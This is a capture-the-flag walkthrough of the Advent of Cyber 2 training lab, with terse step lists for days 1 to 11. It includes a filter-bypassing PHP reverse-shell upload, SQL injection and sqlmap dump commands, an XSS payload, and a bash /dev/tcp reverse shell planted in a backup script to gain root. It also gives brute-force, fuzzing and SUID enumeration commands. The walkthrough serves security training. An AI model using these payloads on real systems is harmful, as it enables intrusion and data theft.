Advent of Cyber 2
The first 23 days are simple bullet points describing how to do the task. Day 24 is a more complete write-up, as it was a more complete challenge!
Table of Contents [Day 1] Web Exploitation: A Christmas Crisis [encoding] [Day 2] Web Exploitation: The Elf Strikes Back! [file upload] [Day 3] Web Exploitation: Christmas Chaos [brute force] [Day 4] Web Exploitation: Santas watching [brute force / fuzzing] [Day 5] Web Exploitation: Someone stole Santas gift list! [SQLi] [Day 6] Web Exploitation: Be careful with what you wish on a Christmas night [XSS] [Day 7] Networking: The Grinch Really Did Steal Christmas [pcap] [Day 8] Networking: Whats Under the Christmas Tree? [nmap] [Day 9] Networking: Anyone can be Santa! [ftp] [Day 10] Networking: Dont be sElfish! [Samba] [Day 11] Networking: The Rogue Gnome [SUID] [Day 12] Networking: Ready, set, elf. [msf] [Day 13] Special by John Hammond: Coal for Christmas [manual exploit] [Day 14] Special by TheCyberMentor: Wheres Rudolph? [OSINT] [Day 15] Scripting: Theres a Python in my stocking! [Python] [Day 16] Scripting: Help! Where is Santa? [Python] [Day 17] Reverse Engineering: ReverseELFneering [RE x86] [Day 18] Reverse Engineering: The Bits of Christmas [RE .NET] [Day 19] Special by Tib3rius: The Naughty or Nice List [SSRF] [Day 20] Blue Teaming: PowershELlF to the rescue [PowerShell] [Day 21] Blue Teaming: Time for some ELForensics [strings, ADS, wmic] [Day 22] Blue Teaming: Elf McEager becomes CyberElf [CyberChef] [Day 23] Blue Teaming The Grinch strikes again! [vss] [Day 24] Special by DarkStar The Trial Before Christmas [lots!] [Day 1] Web Exploitation: A Christmas Crisis [encoding] Register and log in Check cookies Decode using Cyberchef All numbers and early-in-the-alphabet letters → hex Recognise format Adjust username and re-encode using Cyberchef Replace cookie value and refresh page Turn everything on → success! [Day 2] Web Exploitation: The Elf Strikes Back! [file upload] Create exploit script as described Go to URL including GET request http://<url>/?id=<id-token> Check source code for upload types Rename script to bypass filter $ mv php-reverse-shell.php php-reverse-shell.jpg.php Upload file. Simple message “File received successfully!” Check Burp Suite history - the POST was to /upload, so perhaps /uploads/? Test: http://10.10.35.237/uploads/ → success! Also checked page source, find http://10.10.35.237/assets/js/upload.js. It’s obfuscated, but so use https://beautifier.io/ and http://jsnice.org/ to make sense of it. However, doesn’t seem to give much. Hints suggest using a directory brute-forcer Set up netcat listener: $ sudo nc -lvnp 443 Click file from http://10.10.35.237/uploads/, or visit full URL http://10.10.35.237/uploads/php-reverse-shell.jpg.php Check netcat, find shell sh-4.4$ cat /var/www/flag.txt → success! [Day 3] Web Exploitation: Christmas Chaos [brute force] Follow instructions to use Burp Suite to crack Intercept login Send to Intruder Clust Bomb Set Payloads Attack One result has different length returned → success! [Day 4] Web Exploitation: Santa’s watching [brute force / fuzzing] wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ $ gobuster dir -u http://10.10.176.185/ -w /usr/share/wordlists/dirb/common.txt -x php. Found /api, which led to http://10.10.176.185/api/site-log.php → success! $ wfuzz -c -z file,wordlist http://10.10.176.185/api/site-log.php?date=FUZZ (wordlist downloaded from THM). Only one had any characters → success! [Day 5] Web Exploitation: Someone stole Santa’s gift list! [SQLi] Find login page. Not /login or /login.php. Nothing in source. Check hint. Attempt login using Burp Suite browser, find POST in HTTP history and send to Repeater, then save as panel_login. $ sqlmap -r panel_login --batch Meanwhile, try the obvious SQLi: santa:' or 1=1 -- → success! Try the same ' or 1=1 -- in the panel → success! Same the gift database POST request (as above) as gift_db $ sqlmap -r gift_db --batch --dump → success! [Day 6] Web Exploitation: Be careful with what you wish on a Christmas night [XSS] Run manual test: Add wish of <script>alert('xss');</script>, refresh page, get alert box → XSS Use ZAP Automated Scan as suggested [Day 7] Networking: The Grinch Really Did Steal Christmas [pcap] ICMP to view pings http.request.method == GET to view HTTP GETs frame contains password to find the FTP cleartext password Export objects to find the wishlist [Day 8] Networking: What’s Under the Christmas Tree? [nmap] $ sudo nmap -A 10.10.27.82 -T4 -v → success! [Day 9] Networking: Anyone can be Santa! [ftp] $ ftp 10.10.222.6 → anonymous ftp> ls -la to view current directory contents ftp> cd public then view current directory contents ftp> get shoppinglist.txt to download the file, then view it with $ cat ftp> get backup.sh then edit to include bash -i >& /dev/tcp/10.4.5.126/4242 0>&1 $ nc -lvnp 4242 then wait for shell root@tbfc-ftp-01:~# cat /root/flag.txt → success! [Day 10] Networking: Don’t be sElfish! [Samba] $ enum4linux -a 10.10.122.80 to see what’s available $ smbclient //10.10.122.80/tbfc-santa to access share (no password) [Day 11] Networking: The Rogue Gnome [SUID] find / -perm -u=s -type f 2>/dev/null
